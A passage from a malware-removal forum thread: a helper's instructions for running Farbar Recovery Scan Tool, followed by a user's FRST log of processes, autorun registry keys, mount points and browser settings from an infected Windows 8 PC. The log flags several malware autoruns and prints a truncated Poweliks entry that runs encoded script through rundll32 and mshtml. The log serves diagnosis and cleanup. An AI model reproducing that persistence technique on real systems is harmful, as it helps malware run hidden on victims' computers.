  • When the tool opens click Yes to disclaimer.
  • Make sure that Addition option is checked.
  • Press Scan button and wait.
  • The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.

Please include their content in your next reply.


Radek Naathim Pawelczyk

Malware Removal Specialist

 



#5 RaRWolf

RaRWolf
  • Topic Starter

  • Members
  • 8 posts

Posted 22 October 2014 - 04:25 PM

FRST Scan:

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 22-10-2014
Ran by RaRWolf (administrator) on SHOOBLEDOOBLE on 22-10-2014 17:11:34
Running from C:\Users\RaRWolf\Downloads
Loaded Profile: RaRWolf (Available profiles: RaRWolf)
Platform: Windows 8 (X64) OS Language: English (United States)
Internet Explorer Version 10
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\WTabletServicePro.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
() C:\Program Files (x86)\ASUS\AXSP\1.00.19\atkexComSvc.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AAHM\1.00.20\aaHMSvc.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.13\AsSysCtrlService.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Hi-Rez Studios) C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AI Suite II\AsRoutineController.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AI Suite II\Dr.Net\AsDrNotify.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(Wacom Technology, Corp.) C:\Windows\System32\Wacom_Tablet.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_TouchUser.exe
(LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(Microsoft Corporation) C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe
(Logitech, Inc.) C:\Program Files\Logitech\SetPointP\SetPoint.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Flux Software LLC) C:\Users\RaRWolf\AppData\Local\FluxSoftware\Flux\flux.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
(Logitech, Inc.) C:\Program Files\Common Files\Logishrd\KHAL3\KHALMNPR.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AI Suite II\EPU\EPUHelp.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\nacl64.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\nacl64.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\AAM Updates Notifier.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\updaterstartuputility.exe
(BitTorrent Inc.) C:\Users\RaRWolf\AppData\Roaming\uTorrent\uTorrent.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(WB Games, Inc.) C:\Program Files (x86)\Steam\steamapps\common\ShadowOfMordor\x64\ShadowOfMordor.exe
(Valve Corporation) C:\Program Files (x86)\Steam\GameOverlayUI.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [446392 2012-04-04] (Adobe Systems Incorporated)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2403104 2014-07-25] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation)
HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3100440 2014-05-19] (Logitech, Inc.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6548112 2012-06-12] (Realtek Semiconductor)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-04-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [ASUS Ai Charger] => C:\Program Files (x86)\ASUS\ASUS Ai Charger\AiChargerAP.exe [547984 2012-08-13] (ASUSTek Computer Inc.)
HKLM-x32\...\Run: [ASUS Easy Update] => C:\Program Files (x86)\ASUS\ASUS Easy Update\ALU.exe [195200 2012-05-24] (ASUSTeK Computer Inc.)
HKLM-x32\...\Run: [ASUSWebStorage] => C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.3.105\AsusWSPanel.exe [3405696 2012-06-25] (ASUS Cloud Corporation)
HKLM-x32\...\Run: [ASUSPRP] => C:\Program Files (x86)\ASUS\APRP\APRP.EXE [2984688 2012-09-14] (ASUSTek Computer Inc.)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [91432 2012-03-28] (CyberLink Corp.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-09-13] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2013-02-20] (Apple Inc.)
HKLM-x32\...\Run: [amd_dc_opt] => C:\Program Files (x86)\AMD\Dual-Core Optimizer\amd_dc_opt.exe [77824 2008-07-22] (AMD)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKLM-x32\...\Run: [TkBellExe] => C:\Program Files (x86)\Real\RealPlayer\update\realsched.exe [296520 2014-08-01] (RealNetworks, Inc.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Razer Synapse] => C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe [585560 2014-06-23] (Razer Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [256896 2014-07-25] (Oracle Corporation)
HKLM-x32\...\Run: [LogMeIn Hamachi Ui] => C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe [3802448 2014-09-04] (LogMeIn Inc.)
Winlogon\Notify\LBTWlgn: c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll (Logitech, Inc.)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [1938624 2014-10-21] (Valve Corporation)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [DAEMON Tools Lite] => C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe [3672640 2013-03-14] (Disc Soft Ltd)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [Dxtory Update Checker 2.0] => C:\Program Files (x86)\ExKode\Dxtory2.0\UpdateChecker.exe [93696 2010-10-17] (Dxtory Software)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [MurGee.com Auto Clicker] => C:\Program Files (x86)\Auto Clicker\AutoClicker.exe [90440 2013-08-15] (MurGee.com)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [f.lux] => C:\Users\RaRWolf\AppData\Local\FluxSoftware\Flux\flux.exe [1017224 2013-10-23] (Flux Software LLC)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [uTorrent] => C:\Users\RaRWolf\AppData\Roaming\uTorrent\uTorrent.exe [1385808 2014-10-16] (BitTorrent Inc.)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [Razer Comms] => C:\Program Files (x86)\Razer\Comms\ChatApplet.exe [11233088 2014-08-01] (Razer Inc.)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [GoogleChromeAutoLaunch_0174F854A725FE2A1C6FD2A6E7F56180] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [854344 2014-10-09] (Google Inc.)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [6482200 2014-09-26] (Piriform Ltd)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [Okfylaigkiepqul] => C:\Users\RaRWolf\AppData\Local\Temp\47e8\AppData\Roaming\Hewavy\olbuhi.exe <===== ATTENTION
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [{eaab0735-f4dd-2c20-e526-c77a5339bc54}] => C:\Users\RaRWolf\AppData\Local\Temp\18b98\AppData\Local\Microsoft\{eaab0735-f4dd-2c20-e526-c77a5339bc54}\{eaab0735-f4dd-2c20-e526-c77a5339bc54}.exe [0 2014-10-17] () <===== ATTENTION
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [Xohokebonien] => "C:\Users\RaRWolf\AppData\Local\Temp\47e8\AppData\Roaming\Axutwu\osama.exe" <===== ATTENTION
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [Oxveroifbav] => "C:\Users\RaRWolf\AppData\Roaming\Opfocyf\ebkawau.exe"
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [Ezymkuzoawcy] => C:\Users\RaRWolf\AppData\Roaming\Adtuguka\hozuupw.exe
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [Fuoxcoy] => C:\Users\RaRWolf\AppData\Roaming\Xyasocki\dugit.exe
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [Ozotovihulipa] => "C:\Users\RaRWolf\AppData\Roaming\Ifylqyte\aldinae.exe"
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\CurrentVersion\Windows: [Load] C:\Users\RaRWolf\LOCALS~1\Temp\mswuuuq.com <===== ATTENTION
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {052c3cd4-0787-11e4-bef9-3085a9a720f7} - "W:\Setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {0531270f-9781-11e3-bedd-3085a9a720f7} - "W:\autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {10709a9d-09d0-11e3-bec3-3085a9a720f7} - "W:\AutoRunMorrowind.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {16c2790a-f6d3-11e2-beb7-3085a9a720f7} - "V:\LaunchBF.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {16c27936-f6d3-11e2-beb7-3085a9a720f7} - "G:\LaunchBF.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {16c27938-f6d3-11e2-beb7-3085a9a720f7} - "G:\LaunchBF.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {1fd923c8-bc33-11e3-bee5-3085a9a720f7} - "M:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {204b18f3-c014-11e3-bee6-3085a9a720f7} - "W:\Setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {218680d2-f681-11e3-bef3-3085a9a720f7} - "W:\AUTORUN.EXE" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {218684f4-f681-11e3-bef3-3085a9a720f7} - "W:\AUTORUN.EXE" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {224231d1-c503-11e2-be9f-3085a9a720f7} - "G:\LaunchEAWG.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {224233b8-c503-11e2-be9f-3085a9a720f7} - "D:\LaunchEAWG.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {224239be-c503-11e2-be9f-3085a9a720f7} - "V:\LaunchEAWG.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {224239c6-c503-11e2-be9f-3085a9a720f7} - "V:\LaunchEAWG.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {27e8eeda-466e-11e4-bf02-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {2db2656c-2f40-11e4-bf02-3085a9a720f7} - "W:\autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {2db265cd-2f40-11e4-bf02-3085a9a720f7} - "W:\PLAY.EXE" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {2db265d3-2f40-11e4-bf02-3085a9a720f7} - "W:\PLAY.EXE" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {2db2668f-2f40-11e4-bf02-3085a9a720f7} - "W:\PLAY.EXE" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {5225a7b0-262b-11e3-beca-3085a9a720f7} - "G:\autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {5fb8944e-6f5a-11e3-bed8-3085a9a720f7} - "W:\LaunchEAWG.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {61382182-c8f3-11e3-bee9-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {61382315-c8f3-11e3-bee9-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {669ae025-c999-11e2-be9f-3085a9a720f7} - "V:\LaunchBFII.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {75ca72ec-0943-11e3-bec1-3085a9a720f7} - "W:\AutoRunMorrowind.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {75ca7318-0943-11e3-bec1-3085a9a720f7} - "G:\AutoRunTribunal.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {75ca7333-0943-11e3-bec1-3085a9a720f7} - "G:\AutoRunBloodmoon.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {7675d3a1-2dd6-11e3-becb-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {81542b50-c6b0-11e3-bee8-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {81b30cb5-ce51-11e3-beea-3085a9a720f7} - "W:\autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {88bc3d74-e828-11e2-beb3-3085a9a720f7} - "V:\setup.exe" /autorun
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {8b2c3f59-14a9-11e4-befb-3085a9a720f7} - "W:\gods2.0.0.1.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {8b2c4780-14a9-11e4-befb-3085a9a720f7} - "W:\Autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {8b2c48b7-14a9-11e4-befb-3085a9a720f7} - "W:\Autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {8b2c48ea-14a9-11e4-befb-3085a9a720f7} - "W:\Autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {8b608f49-403c-11e4-bf02-3085a9a720f7} - "W:\Install.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {8eecf028-4496-11e3-becd-3085a9a720f7} - "W:\Installer.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cc21-e00f-11e2-beb0-3085a9a720f7} - "V:\AutoRunMorrowind.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cc51-e00f-11e2-beb0-3085a9a720f7} - "W:\AutoRunBloodmoon.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cc60-e00f-11e2-beb0-3085a9a720f7} - "X:\AutoRunTribunal.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cce6-e00f-11e2-beb0-3085a9a720f7} - "V:\AutoRunMorrowind.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cf09-e00f-11e2-beb0-3085a9a720f7} - "V:\AutoRunMorrowind.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cf54-e00f-11e2-beb0-3085a9a720f7} - "W:\AutoRunBloodmoon.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cf67-e00f-11e2-beb0-3085a9a720f7} - "X:\AutoRunTribunal.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cf84-e00f-11e2-beb0-3085a9a720f7} - "V:\AutoRunMorrowind.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cfbe-e00f-11e2-beb0-3085a9a720f7} - "X:\AutoRunTribunal.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {983b7abb-fe41-11e2-bebd-20aa4b7ab8bf} - "V:\Install.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9b30cb6a-dbb5-11e3-beec-3085a9a720f7} - "W:\autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9b30cc47-dbb5-11e3-beec-3085a9a720f7} - "W:\autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9b30d536-dbb5-11e3-beec-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9b30d7dc-dbb5-11e3-beec-3085a9a720f7} - "W:\autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {b357db0c-3a8d-11e3-becc-3085a9a720f7} - "W:\MB-Warband-Napoleonic-Wars.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {b357e30d-3a8d-11e3-becc-3085a9a720f7} - "W:\MB-Warband-Napoleonic-Wars.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {c37b970e-c401-11e3-bee7-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {c37b985e-c401-11e3-bee7-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {c37b98a3-c401-11e3-bee7-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {c37b98ae-c401-11e3-bee7-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {cfd62f9e-d92d-11e3-beec-3085a9a720f7} - "W:\Setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {dd3c40e4-f792-11e3-bef3-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {dd3c41c9-f792-11e3-bef3-3085a9a720f7} - "W:\Setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {e71be4cb-cac0-11e3-bee9-3085a9a720f7} - "W:\Autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {ea73b1b6-0701-11e2-be6b-806e6f6e6963} - "E:\install.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
AppInit_DLLs-x32: DllInjectHelper.dll => "DllInjectHelper.dll" File Not Found
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RealPlayer Cloud Service UI.lnk
ShortcutTarget: RealPlayer Cloud Service UI.lnk -> C:\Program Files (x86)\Real\RealPlayer\RPDS\Bin64\rpsystray.exe (RealNetworks, Inc.)
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
ShellIconOverlayIdentifiers: [AsusWSShellExt_B] -> {6D4133E5-0742-4ADC-8A8C-9303440F7190} => C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.3.105\ASUSWSShellExt64.dll (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [AsusWSShellExt_O] -> {64174815-8D98-4CE6-8646-4C039977D808} => C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.3.105\ASUSWSShellExt64.dll (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [AsusWSShellExt_U] -> {1C5AB7B1-0B38-4EC4-9093-7FD277E2AF4D} => C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.3.105\ASUSWSShellExt64.dll (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://asus13.msn.com
SearchScopes: HKLM - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=ASU2JS
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=ASU2JS
SearchScopes: HKLM-x32 - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=ASU2JS
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=ASU2JS
SearchScopes: HKCU - DefaultScope {DE735EC1-AA5B-4ED2-A1F0-B6C85F4E8ABE} URL = http://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=714647&p={searchTerms}
SearchScopes: HKCU - {DE735EC1-AA5B-4ED2-A1F0-B6C85F4E8ABE} URL = http://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=714647&p={searchTerms}
BHO: Bing Bar Helper -> {1dad3af3-ef2f-4f64-ac4b-11789189fcb6} -> C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\amd64\BingExt.dll (Microsoft Corporation.)
BHO: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin64.dll (RealDownloader)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation)
BHO: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\SetPointSmooth.dll (Logitech, Inc.)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Bing Bar Helper -> {1dad3af3-ef2f-4f64-ac4b-11789189fcb6} -> C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BingExt.dll (Microsoft Corporation.)
BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll (RealDownloader)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
